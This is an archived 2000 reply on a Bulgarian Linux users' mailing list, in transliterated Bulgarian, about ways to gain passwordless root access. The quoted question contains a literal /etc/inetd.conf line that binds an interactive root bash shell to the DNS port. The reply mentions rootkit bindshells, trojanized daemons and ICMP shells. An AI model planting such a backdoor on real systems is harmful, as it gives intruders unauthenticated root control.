Re: lug-bg: security
- Subject: Re: lug-bg: security
- From: famzah@xxxxxxxxxx (Ivan Zahariev)
- Date: Sat, 02 Dec 2000 14:01:12 +0200
Angel Radovanov wrote:
> Vyprosyt mi e svyrzan s sigurnosta, i po tochno s tova kak moze user na se logne v sistemata bez pass i s root prava. Ineteresuvam se po kolko nachina moze da se napravi tova.
> Az se sshtam samo za edin i toj e:
> v /etc/inetd.conf dobaviame:
>
> domain stream tcp nowait root /usr/local/bin/bash bash -i
>
> Izbrah domain zashtoto naj-chesto ne se filtrira.
> Ako niakoj ot ima drugi idej da kaze .....
>
> ==================================================================
> A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers)
> Otpiswaneto RABOTI !!! : Majordomo@xxxxxxxxxxxxxxxxxx UNSUBSCRIBE LUG-BG
> http://www.linux-bulgaria.org/ Hosted by Internet Group Ltd. - Stara Zagora
heh :)
ako imash vuln. daemon pusnat ot root (obiknoveno named, ftpd, etc) kato go hackne s nekoi exploit pak ste si e root i to bez da pishe parola.
drug na4in da se vurne (kato te e hacknal) e da ti trojanizira goliama 4ast ot daemonite pusnati pod root (ili samia kernel dori)
a i ne vijdam sto triabva zaduljitelno prez inetd.conf da si otvaria sh. moje i da si pusne otdelna pragrama. v rootkits ima bindshell.c se kazva (v slu4ai 4e ps, pstree, etc sa
trojanizirani razbira se)
4estno da ti kaja, tvurde mnogo na4ini ima da se vurne/vleze kato root ako vednuj te e hacknal nekoi ili puk si sus stari vuln. programi (poniakoga dori e ujasno trudno da go
hvanesh, 4e ti buta mashinata, ako naprimer e vliazul prez ICMP shell - w00w00 razrabotka naprimer)
vurvi pro4eti http://www.securityfocus.com Ima interesni statii za security, niakoi sa osobeno polezni.
Regards, famzah
==================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers)
Otpiswaneto RABOTI !!! : Majordomo@xxxxxxxxxxxxxxxxxx UNSUBSCRIBE LUG-BG
http://www.linux-bulgaria.org/ Hosted by Internet Group Ltd. - Stara Zagora
|